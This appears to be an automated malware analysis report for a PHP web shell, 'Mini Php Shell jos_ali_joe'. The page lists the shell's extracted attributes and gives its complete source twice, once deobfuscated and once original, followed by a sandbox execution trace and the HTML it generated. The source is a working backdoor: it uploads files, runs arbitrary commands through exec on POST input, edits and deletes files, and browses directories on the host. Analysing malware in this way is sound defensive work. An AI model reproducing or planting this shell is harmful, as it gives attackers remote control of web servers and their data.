PHP Malware Analysis
mini.php
md5: f4eab243196403cb5ca480f14049d589
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- ali@explorecrew.org (Deobfuscated, HTML, Original)
Environment
- getcwd (Deobfuscated, Original, Traces)
- php_uname (Deobfuscated, Original, Traces)
Execution
- exec (Deobfuscated)
Files
- move_uploaded_file (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- Mini Php Shell jos_ali_joe (Deobfuscated, HTML, Original)
URLs
- http://explorecrew.org/ (Deobfuscated, HTML, Original)
- http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<html>
<head>
<title>Mini Php Shell jos_ali_joe</title>
<style type="text/css">
a {
text-decoration: none;
display: block;
}
a img {
border: 0;
}
#view tr:hover {
background-color: #FFFFFF;
}
input {
font-family: Courier New, Courier, Fixed;
font-size: 15px;
background-color: #FFFFFF;
color: #000000;
}
input:hover {
background-color: #000000;
}
textarea {
font-family: Courier New, Courier, Fixed;
font-size: 15px;
background-color: #FFFFFF;
color: #000000;
}
body {
font-family: Courier New, Courier, Fixed;
font-size: 10px;
color: #FFFFFF;
}
table#bordered {
border: 1px solid #FFFFFF;
background-color: #000;
font-family: Courier New, Courier, Fixed;
font-size: 15px;
color: #FFFFFF;
}
form#post {}
#post .buttons {
background-color: transparent;
font-family: Arial;
font-size: 15px;
color: #777;
border: 0;
}
#cell {
border-bottom: 1px #FFFFFF dotted;
}
</style>
</head>
<body bgcolor="#000000" background="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg" link="#444444" vlink="#444444">
<h1 style='color: #fff'><u><a href="<?php
print $_SERVER['PHP_SELF'];
?>" style="color: #fff">
Mini Php Shell jos_ali_joe V27.9</a></u></h1>
<p style="color: #fff">Coded by jos_ali_joe<br><br># web: <u><a http://explorecrew.org/" style="display: inline;
color: #fff">http://explorecrew.org/</a></u><br> # Contact : ali@explorecrew.org </u></p><br>
<table border=0 id="bordered">
<?php
function getperms($f)
{
$mode = fileperms($f);
$perm = '';
$perm .= $mode & 0400 ? 'r' : '-';
$perm .= $mode & 0200 ? 'w' : '-';
$perm .= $mode & 0100 ? 'x' : '-';
$perm .= $mode & 040 ? 'r' : '-';
$perm .= $mode & 020 ? 'w' : '-';
$perm .= $mode & 010 ? 'x' : '-';
$perm .= $mode & 04 ? 'r' : '-';
$perm .= $mode & 02 ? 'w' : '-';
$perm .= $mode & 01 ? 'x' : '-';
return $perm;
}
print "<tr><td>~ host </td><td><b>" . $_SERVER['SERVER_NAME'] . "</b></td></tr>";
print "<tr><td>~ server </td><td><b>" . $_SERVER['SERVER_SOFTWARE'] . "</b></td></tr>";
if (is_callable("php_uname")) {
print "<tr><td>~ os </td><td><b>" . php_uname() . "</b></td></tr>";
}
if (is_callable("posix_getuid") and is_callable("posix_getgid")) {
$uid = posix_getuid();
$uname = posix_getpwuid($uid);
$uname = $uname['name'];
$gid = posix_getgid();
$gname = posix_getgrgid($gid);
$gname = $gname['name'];
print "<tr><td>~ uid </td><td><b>{$uid} ({$uname})</b></td></tr>";
print "<tr><td>~ gid </td><td><b>{$gid} ({$gname})</b></td></tr>";
}
print "</table><br><br>";
if (!isset($_POST['file'])) {
?>
<table border=0 style="font-size: 12px">
<form enctype="multipart/form-data" action="<?php
print $_SERVER['REQUEST_URI'];
?>" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
<input type="hidden" name="do_upload" value="true">
<tr><td>> Upload Data</td></tr>
<tr><td><input type="file" name="userfile"/></td></tr>
<tr><td><input type="submit" value="> send"/></td></tr>
</form>
<tr><td height="20px"></td></tr>
<form action="<?php
print $_SERVER['REQUEST_URI'];
?>" method="POST">
<tr><td>> Comand</td></tr>
<tr><td><input type="text" name="cmd"></td></tr>
<tr><td><input type="submit" value="> execute cmd"></td></tr>
</form>
</table>
<?php
}
#
# Upload di file
#
if ($_POST['do_upload'] === "true") {
if ($_POST['dir'] == "true") {
$dir = $_POST['dirname'];
} else {
$dir = getcwd();
}
$uploadfile = $dir . "/" . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
print "File successfully loaded<br>\n";
print "~ file name: <b>" . $_FILES['userfile']['name'] . "</b><br>" . "\n~ type: " . $_FILES['userfile']['type'] . "<br>\n" . "~ size: " . $_FILES['userfile']['size'] . " bytes<br>\n";
} else {
print "\$ Error while loading " . $_FILES['userfile']['name'] . "<br>\n";
}
}
#
# Modifica o cancellazione di file
#
if (isset($_POST['dofile'])) {
$ref = $_SERVER['HTTP_REFERER'];
$fname = htmlentities($_POST['dofile']);
$content = $_POST['content'];
#
# Modifica
#
if (isset($_POST['save'])) {
if (!($fp = fopen($fname, "w"))) {
die("\$ Unable to write to <b>{$fname}</b><br>\n");
}
fputs($fp, $content);
fclose($fp);
print "File <b>{$fname}</b> successfully updated<br><br>\n";
}
#
# Cancellazione
#
if (isset($_POST['remove'])) {
unlink($fname) or die("\$ Unable to remove <b>{$fname}</b><br>\n");
print "<b>{$fname}</b> successfully removed<br><br>\n";
}
}
#
# Esecuzione di un comando
#
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$output = array();
exec($cmd, $output);
print "<br><hr height=1 width=\"100%\">\n";
print "# cmd output: <br><br><tt>";
print "<div style=\"border: 1px solid #FFFFFF; background-color: #000; padding: 10px\">\n";
foreach ($output as $line) {
print "{$line}<br>\n";
}
print "</div></tt>\n";
die('');
}
#
# Visualizzazione di file
#
if (isset($_POST['fname'])) {
print "# Warning: editing or removing a file is only possible if you've got the privileges to do that<br><br>";
$fname = htmlentities($_POST['fname']);
$file = file($fname) or print "\$ Unable to open <b>{$fname}</b><br>\n";
print "<form action=\"" . $_SERVER['REQUEST_URI'] . "\" method=\"POST\">\n";
print "<input type=\"hidden\" name=\"dofile\" value=\"{$fname}\">\n";
print "<textarea rows=20 cols=80 name=\"content\">";
for ($i = 0; $i < count($file); $i++) {
print htmlentities($file[$i]);
}
print "</textarea><br><br>\n";
print "<input type=\"submit\" value=\"> Save file\" name=\"save\">\n";
print "<input type=\"submit\" value=\"> Delete file\" name=\"remove\">\n";
print "</form>\n";
}
#
# Visualizzazione del contenuto di una directory
#
if (isset($_POST['dirname'])) {
$path = htmlspecialchars($_POST['dirname']);
} else {
$path = getcwd();
}
$dp = opendir($path) or die("\$ Unable to open <b>{$path}</b><br>\n");
chdir($path);
$path = getcwd();
print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "<font color=\"white\">> cwd: <b>" . getcwd() . "</b></font><br><br>\n\n";
$dir = array();
while ($file = readdir($dp)) {
if (strcmp(".", $file)) {
array_push($dir, "{$path}/{$file}");
}
}
closedir($dp);
sort($dir);
?>
<form name="post" id="post" action="<?php
print $_SERVER['REQUEST_URI'];
?>" method="POST">
<table border=0 width="100%" style="border: 1px #FFFFFF solid; background-color: #000">
<?php
for ($i = 0; $i < count($dir); $i++) {
print "<tr style='font-family: Arial; font-size: 11px;'>\n";
#
# Directory superiore
#
if (basename($dir[$i]) === "..") {
$tmp = split('/', getcwd());
$new = "";
for ($j = 0; $j < count($tmp) - 1; $j++) {
$new .= $tmp[$j] . "/";
}
print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">UP</td>\n";
print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"{$new}\" class=\"buttons\"></td></tr>\n";
}
#
# Directory
#
if (is_dir($dir[$i])) {
if (basename($dir[$i]) != '..') {
print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">DIR</td>\n";
print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"" . $dir[$i] . "\" class=\"buttons\"></td>\n";
print "<td id=\"cell\">DIR</td></tr>\n";
}
} else {
if (basename($dir[$i]) != '..') {
print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">FILE</td>\n";
print "<td id=\"cell\"><input type=\"submit\" name=\"fname\" value=\"{$dir[$i]}\" class=\"buttons\"></td>\n";
print "<td id=\"cell\">" . getperms($dir[$i]) . "</td></tr>\n";
}
}
}
print "</table></div>\n";
?>
</body>
</html>Execution traces
data/traces/f4eab243196403cb5ca480f14049d589_trace-1676242651.3256.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:57:57.223384]
1 0 1 0.000161 393512
1 3 0 0.000421 434352 {main} 1 /var/www/html/uploads/mini.php 0 0
2 4 0 0.000442 434352 is_callable 0 /var/www/html/uploads/mini.php 94 1 'php_uname'
2 4 1 0.000459 434384
2 4 R TRUE
2 5 0 0.000473 434352 php_uname 0 /var/www/html/uploads/mini.php 95 0
2 5 1 0.000490 434464
2 5 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 6 0 0.000533 434352 is_callable 0 /var/www/html/uploads/mini.php 97 1 'posix_getuid'
2 6 1 0.000548 434384
2 6 R TRUE
2 7 0 0.000561 434352 is_callable 0 /var/www/html/uploads/mini.php 97 1 'posix_getgid'
2 7 1 0.000583 434384
2 7 R TRUE
2 8 0 0.000605 434352 posix_getuid 0 /var/www/html/uploads/mini.php 98 0
2 8 1 0.000624 434352
2 8 R 33
1 A /var/www/html/uploads/mini.php 98 $uid = 33
2 9 0 0.000651 434352 posix_getpwuid 0 /var/www/html/uploads/mini.php 99 1 33
2 9 1 0.000684 435184
2 9 R ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1 A /var/www/html/uploads/mini.php 99 $uname = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1 A /var/www/html/uploads/mini.php 100 $uname = 'www-data'
2 10 0 0.000740 434392 posix_getgid 0 /var/www/html/uploads/mini.php 102 0
2 10 1 0.000752 434392
2 10 R 33
1 A /var/www/html/uploads/mini.php 102 $gid = 33
2 11 0 0.000775 434392 posix_getgrgid 0 /var/www/html/uploads/mini.php 103 1 33
2 11 1 0.000803 435056
2 11 R ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1 A /var/www/html/uploads/mini.php 103 $gname = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1 A /var/www/html/uploads/mini.php 104 $gname = 'www-data'
2 12 0 0.000874 434432 getcwd 0 /var/www/html/uploads/mini.php 234 0
2 12 1 0.000889 434480
2 12 R '/var/www/html/uploads'
1 A /var/www/html/uploads/mini.php 234 $path = '/var/www/html/uploads'
2 13 0 0.000914 434480 opendir 0 /var/www/html/uploads/mini.php 236 1 '/var/www/html/uploads'
2 13 1 0.000934 434872
2 13 R resource(4) of type (stream)
1 A /var/www/html/uploads/mini.php 236 $dp = resource(4) of type (stream)
2 14 0 0.000962 434840 chdir 0 /var/www/html/uploads/mini.php 237 1 '/var/www/html/uploads'
2 14 1 0.000977 434928
2 14 R TRUE
2 15 0 0.000991 434888 getcwd 0 /var/www/html/uploads/mini.php 238 0
2 15 1 0.001003 434936
2 15 R '/var/www/html/uploads'
1 A /var/www/html/uploads/mini.php 238 $path = '/var/www/html/uploads'
2 16 0 0.001028 434888 getcwd 0 /var/www/html/uploads/mini.php 241 0
2 16 1 0.001040 434936
2 16 R '/var/www/html/uploads'
1 A /var/www/html/uploads/mini.php 242 $dir = []
2 17 0 0.001065 434888 readdir 0 /var/www/html/uploads/mini.php 244 1 resource(4) of type (stream)
2 17 1 0.001089 434968
2 17 R 'mini.php'
1 A /var/www/html/uploads/mini.php 244 $file = 'mini.php'
2 18 0 0.001114 434928 strcmp 0 /var/www/html/uploads/mini.php 245 2 '.' 'mini.php'
2 18 1 0.001127 434992
2 18 R -63
2 19 0 0.001141 435008 array_push 0 /var/www/html/uploads/mini.php 246 2 [] '/var/www/html/uploads/mini.php'
2 19 1 0.001156 435448
2 19 R 1
2 20 0 0.001169 435384 readdir 0 /var/www/html/uploads/mini.php 244 1 resource(4) of type (stream)
2 20 1 0.001183 435456
2 20 R '..'
1 A /var/www/html/uploads/mini.php 244 $file = '..'
2 21 0 0.001205 435376 strcmp 0 /var/www/html/uploads/mini.php 245 2 '.' '..'
2 21 1 0.001218 435440
2 21 R -1
2 22 0 0.001230 435432 array_push 0 /var/www/html/uploads/mini.php 246 2 [0 => '/var/www/html/uploads/mini.php'] '/var/www/html/uploads/..'
2 22 1 0.001245 435496
2 22 R 2
2 23 0 0.001256 435432 readdir 0 /var/www/html/uploads/mini.php 244 1 resource(4) of type (stream)
2 23 1 0.001270 435504
2 23 R '.'
1 A /var/www/html/uploads/mini.php 244 $file = '.'
2 24 0 0.001292 435432 strcmp 0 /var/www/html/uploads/mini.php 245 2 '.' '.'
2 24 1 0.001314 435496
2 24 R 0
2 25 0 0.001326 435432 readdir 0 /var/www/html/uploads/mini.php 244 1 resource(4) of type (stream)
2 25 1 0.001339 435512
2 25 R 'prepend.php'
1 A /var/www/html/uploads/mini.php 244 $file = 'prepend.php'
2 26 0 0.001363 435440 strcmp 0 /var/www/html/uploads/mini.php 245 2 '.' 'prepend.php'
2 26 1 0.001376 435504
2 26 R -66
2 27 0 0.001388 435504 array_push 0 /var/www/html/uploads/mini.php 246 2 [0 => '/var/www/html/uploads/mini.php', 1 => '/var/www/html/uploads/..'] '/var/www/html/uploads/prepend.php'
2 27 1 0.001404 435568
2 27 R 3
2 28 0 0.001416 435504 readdir 0 /var/www/html/uploads/mini.php 244 1 resource(4) of type (stream)
2 28 1 0.001429 435576
2 28 R 'data'
1 A /var/www/html/uploads/mini.php 244 $file = 'data'
2 29 0 0.001452 435496 strcmp 0 /var/www/html/uploads/mini.php 245 2 '.' 'data'
2 29 1 0.001464 435560
2 29 R -54
2 30 0 0.001477 435552 array_push 0 /var/www/html/uploads/mini.php 246 2 [0 => '/var/www/html/uploads/mini.php', 1 => '/var/www/html/uploads/..', 2 => '/var/www/html/uploads/prepend.php'] '/var/www/html/uploads/data'
2 30 1 0.001494 435616
2 30 R 4
2 31 0 0.001506 435552 readdir 0 /var/www/html/uploads/mini.php 244 1 resource(4) of type (stream)
2 31 1 0.001518 435632
2 31 R '.htaccess'
1 A /var/www/html/uploads/mini.php 244 $file = '.htaccess'
2 32 0 0.001542 435560 strcmp 0 /var/www/html/uploads/mini.php 245 2 '.' '.htaccess'
2 32 1 0.001554 435624
2 32 R -8
2 33 0 0.001567 435616 array_push 0 /var/www/html/uploads/mini.php 246 2 [0 => '/var/www/html/uploads/mini.php', 1 => '/var/www/html/uploads/..', 2 => '/var/www/html/uploads/prepend.php', 3 => '/var/www/html/uploads/data'] '/var/www/html/uploads/.htaccess'
2 33 1 0.001584 435680
2 33 R 5
2 34 0 0.001596 435616 readdir 0 /var/www/html/uploads/mini.php 244 1 resource(4) of type (stream)
2 34 1 0.001610 435656
2 34 R FALSE
1 A /var/www/html/uploads/mini.php 244 $file = FALSE
2 35 0 0.001633 435576 closedir 0 /var/www/html/uploads/mini.php 248 1 resource(4) of type (stream)
2 35 1 0.001649 435392
2 35 R NULL
2 36 0 0.001662 435352 sort 0 /var/www/html/uploads/mini.php 249 1 [0 => '/var/www/html/uploads/mini.php', 1 => '/var/www/html/uploads/..', 2 => '/var/www/html/uploads/prepend.php', 3 => '/var/www/html/uploads/data', 4 => '/var/www/html/uploads/.htaccess']
2 36 1 0.001682 435384
2 36 R TRUE
1 A /var/www/html/uploads/mini.php 256 $i = 0
2 37 0 0.001707 435352 basename 0 /var/www/html/uploads/mini.php 262 1 '/var/www/html/uploads/..'
2 37 1 0.001724 435416
2 37 R '..'
1 3 1 0.001746 435688
1 38 0 0.001755 435720 Error->__toString 0 Unknown 0 0
2 39 0 0.001768 435800 Error->getTraceAsString 0 Unknown 0 0
2 39 1 0.001781 436056
2 39 R '#0 {main}'
1 38 1 0.001798 436352
1 38 R 'Error: Call to undefined function split() in /var/www/html/uploads/mini.php:263\nStack trace:\n#0 {main}'
0.001865 356992
TRACE END [2023-02-12 20:57:57.225123]
Generated HTML code
<html><head>
<title>Mini Php Shell jos_ali_joe</title>
<style type="text/css">
a {
text-decoration: none;
display: block;
}
a img {
border: 0;
}
#view tr:hover {
background-color: #FFFFFF;
}
input {
font-family: Courier New, Courier, Fixed;
font-size: 15px;
background-color: #FFFFFF;
color: #000000;
}
input:hover {
background-color: #000000;
}
textarea {
font-family: Courier New, Courier, Fixed;
font-size: 15px;
background-color: #FFFFFF;
color: #000000;
}
body {
font-family: Courier New, Courier, Fixed;
font-size: 10px;
color: #FFFFFF;
}
table#bordered {
border: 1px solid #FFFFFF;
background-color: #000;
font-family: Courier New, Courier, Fixed;
font-size: 15px;
color: #FFFFFF;
}
form#post {}
#post .buttons {
background-color: transparent;
font-family: Arial;
font-size: 15px;
color: #777;
border: 0;
}
#cell {
border-bottom: 1px #FFFFFF dotted;
}
</style>
</head>
<body bgcolor="#000000" background="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg" link="#444444" vlink="#444444">
<h1 style="color: #fff"><u><a href="/mini.php" style="color: #fff">
Mini Php Shell jos_ali_joe V27.9</a></u></h1>
<p style="color: #fff">Coded by jos_ali_joe<br><br># web: <u><a http:="" explorecrew.org="" "="" style="display: inline;
color: #fff">http://explorecrew.org/</a></u><br> # Contact : ali@explorecrew.org </p><br>
<table border="0" id="bordered">
<tbody><tr><td>~ host </td><td><b>localhost</b></td></tr><tr><td>~ server </td><td><b>Apache/2.4.52 (Ubuntu)</b></td></tr><tr><td>~ os </td><td><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b></td></tr><tr><td>~ uid </td><td><b>33 (www-data)</b></td></tr><tr><td>~ gid </td><td><b>33 (www-data)</b></td></tr></tbody></table><br><br>
<table border="0" style="font-size: 12px">
<form enctype="multipart/form-data" action="/mini.php" method="POST"></form>
<input type="hidden" name="MAX_FILE_SIZE" value="200000000">
<input type="hidden" name="do_upload" value="true">
<tbody><tr><td>> Upload Data</td></tr>
<tr><td><input type="file" name="userfile"></td></tr>
<tr><td><input type="submit" value="> send"></td></tr>
<tr><td height="20px"></td></tr>
<form action="/mini.php" method="POST"></form>
<tr><td>> Comand</td></tr>
<tr><td><input type="text" name="cmd"></td></tr>
<tr><td><input type="submit" value="> execute cmd"></td></tr>
</tbody></table>
<div id="view"><hr height="1" width="100%">
<font color="white">> cwd: <b>/var/www/html</b></font><br><br>
<form name="post" id="post" action="/mini.php" method="POST">
<table border="0" width="100%" style="border: 1px #FFFFFF solid; background-color: #000">
<tbody><tr style="font-family: Arial; font-size: 11px;">
</tr></tbody></table></form></div></body></html>Original PHP code
<html>
<head>
<title>Mini Php Shell jos_ali_joe</title>
<style type="text/css">
a {
text-decoration: none;
display: block;
}
a img {
border: 0;
}
#view tr:hover {
background-color: #FFFFFF;
}
input {
font-family: Courier New, Courier, Fixed;
font-size: 15px;
background-color: #FFFFFF;
color: #000000;
}
input:hover {
background-color: #000000;
}
textarea {
font-family: Courier New, Courier, Fixed;
font-size: 15px;
background-color: #FFFFFF;
color: #000000;
}
body {
font-family: Courier New, Courier, Fixed;
font-size: 10px;
color: #FFFFFF;
}
table#bordered {
border: 1px solid #FFFFFF;
background-color: #000;
font-family: Courier New, Courier, Fixed;
font-size: 15px;
color: #FFFFFF;
}
form#post {}
#post .buttons {
background-color: transparent;
font-family: Arial;
font-size: 15px;
color: #777;
border: 0;
}
#cell {
border-bottom: 1px #FFFFFF dotted;
}
</style>
</head>
<body bgcolor="#000000" background="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1338.snc4/163084_194272833919515_100000103989299_786756_1673828_n.jpg" link="#444444" vlink="#444444">
<h1 style='color: #fff'><u><a href="<?php print $_SERVER['PHP_SELF']; ?>" style="color: #fff">
Mini Php Shell jos_ali_joe V27.9</a></u></h1>
<p style="color: #fff">Coded by jos_ali_joe<br><br># web: <u><a http://explorecrew.org/" style="display: inline;
color: #fff">http://explorecrew.org/</a></u><br> # Contact : ali@explorecrew.org </u></p><br>
<table border=0 id="bordered">
<?php
function getperms($f) {
$mode=fileperms($f);
$perm='';
$perm .= ($mode & 00400) ? 'r' : '-';
$perm .= ($mode & 00200) ? 'w' : '-';
$perm .= ($mode & 00100) ? 'x' : '-';
$perm .= ($mode & 00040) ? 'r' : '-';
$perm .= ($mode & 00020) ? 'w' : '-';
$perm .= ($mode & 00010) ? 'x' : '-';
$perm .= ($mode & 00004) ? 'r' : '-';
$perm .= ($mode & 00002) ? 'w' : '-';
$perm .= ($mode & 00001) ? 'x' : '-';
return $perm;
}
print "<tr><td>~ host </td><td><b>".$_SERVER['SERVER_NAME']."</b></td></tr>";
print "<tr><td>~ server </td><td><b>".$_SERVER['SERVER_SOFTWARE']."</b></td></tr>";
if (is_callable("php_uname"))
print "<tr><td>~ os </td><td><b>".php_uname()."</b></td></tr>";
if (is_callable("posix_getuid") and is_callable("posix_getgid")) {
$uid=posix_getuid();
$uname=posix_getpwuid($uid);
$uname=$uname['name'];
$gid=posix_getgid();
$gname=posix_getgrgid($gid);
$gname=$gname['name'];
print "<tr><td>~ uid </td><td><b>$uid ($uname)</b></td></tr>";
print "<tr><td>~ gid </td><td><b>$gid ($gname)</b></td></tr>";
}
print "</table><br><br>";
if (!isset($_POST['file'])) {
?>
<table border=0 style="font-size: 12px">
<form enctype="multipart/form-data" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="200000000"/>
<input type="hidden" name="do_upload" value="true">
<tr><td>> Upload Data</td></tr>
<tr><td><input type="file" name="userfile"/></td></tr>
<tr><td><input type="submit" value="> send"/></td></tr>
</form>
<tr><td height="20px"></td></tr>
<form action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<tr><td>> Comand</td></tr>
<tr><td><input type="text" name="cmd"></td></tr>
<tr><td><input type="submit" value="> execute cmd"></td></tr>
</form>
</table>
<?php
}
#
# Upload di file
#
if ($_POST['do_upload']==="true") {
if ($_POST['dir']=="true")
$dir=$_POST['dirname'];
else
$dir=getcwd();
$uploadfile=$dir."/".basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) {
print "File successfully loaded<br>\n";
print "~ file name: <b>".$_FILES['userfile']['name']."</b><br>".
"\n~ type: ".$_FILES['userfile']['type']."<br>\n".
"~ size: ".$_FILES['userfile']['size']." bytes<br>\n";
}
else print "$ Error while loading ".$_FILES['userfile']['name']."<br>\n";
}
#
# Modifica o cancellazione di file
#
if (isset($_POST['dofile'])) {
$ref=$_SERVER['HTTP_REFERER'];
$fname=htmlentities($_POST['dofile']);
$content=$_POST['content'];
#
# Modifica
#
if (isset($_POST['save'])) {
if (!($fp=fopen($fname,"w")))
die ("$ Unable to write to <b>$fname</b><br>\n");
fputs ($fp,$content);
fclose($fp);
print ("File <b>$fname</b> successfully updated<br><br>\n");
}
#
# Cancellazione
#
if (isset($_POST['remove'])) {
unlink ($fname) or die ("$ Unable to remove <b>$fname</b><br>\n");
print "<b>$fname</b> successfully removed<br><br>\n";
}
}
#
# Esecuzione di un comando
#
if (isset($_POST['cmd'])) {
$cmd=$_POST['cmd'];
$output=array();
exec ($cmd,$output);
print "<br><hr height=1 width=\"100%\">\n";
print "# cmd output: <br><br><tt>";
print "<div style=\"border: 1px solid #FFFFFF; background-color: #000; padding: 10px\">\n";
foreach ($output as $line)
print "$line<br>\n";
print "</div></tt>\n";
die('');
}
#
# Visualizzazione di file
#
if (isset($_POST['fname'])) {
print "# Warning: editing or removing a file is only possible if you've got the privileges to do that<br><br>";
$fname=htmlentities($_POST['fname']);
$file=file($fname) or print "$ Unable to open <b>$fname</b><br>\n";
print "<form action=\"".$_SERVER['REQUEST_URI']."\" method=\"POST\">\n";
print "<input type=\"hidden\" name=\"dofile\" value=\"$fname\">\n";
print "<textarea rows=20 cols=80 name=\"content\">";
for ($i=0; $i<count($file); $i++)
print htmlentities($file[$i]);
print "</textarea><br><br>\n";
print "<input type=\"submit\" value=\"> Save file\" name=\"save\">\n";
print "<input type=\"submit\" value=\"> Delete file\" name=\"remove\">\n";
print "</form>\n";
}
#
# Visualizzazione del contenuto di una directory
#
if (isset($_POST['dirname']))
$path=htmlspecialchars($_POST['dirname']);
else
$path=getcwd();
$dp=opendir($path) or die("$ Unable to open <b>$path</b><br>\n");
chdir ($path);
$path=getcwd();
print "<div id=\"view\"><hr height=1 width=\"100%\">\n";
print "<font color=\"white\">> cwd: <b>".getcwd()."</b></font><br><br>\n\n";
$dir=array();
while ($file=readdir($dp))
if (strcmp(".",$file))
array_push($dir,"$path/$file");
closedir($dp);
sort($dir);
?>
<form name="post" id="post" action="<?php print $_SERVER['REQUEST_URI']; ?>" method="POST">
<table border=0 width="100%" style="border: 1px #FFFFFF solid; background-color: #000">
<?php
for ($i=0; $i<count($dir); $i++) {
print "<tr style='font-family: Arial; font-size: 11px;'>\n";
#
# Directory superiore
#
if (basename($dir[$i])==="..") {
$tmp=split('/',getcwd());
$new="";
for ($j=0; $j<count($tmp)-1; $j++)
$new .= $tmp[$j]."/";
print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">UP</td>\n";
print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"$new\" class=\"buttons\"></td></tr>\n";
}
#
# Directory
#
if (is_dir($dir[$i])) {
if (basename($dir[$i])!='..') {
print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">DIR</td>\n";
print "<td id=\"cell\"><input type=\"submit\" name=\"dirname\" value=\"".$dir[$i].
"\" class=\"buttons\"></td>\n";
print "<td id=\"cell\">DIR</td></tr>\n";
}
}
#
# File comune
#
else {
if (basename($dir[$i])!='..') {
print "<td width=\"40px\" id=\"cell\" style=\"font-size: 9px\">FILE</td>\n";
print "<td id=\"cell\"><input type=\"submit\" name=\"fname\" value=\"$dir[$i]\" class=\"buttons\"></td>\n";
print "<td id=\"cell\">".getperms($dir[$i])."</td></tr>\n";
}
}
}
print "</table></div>\n";
?>
</body>
</html>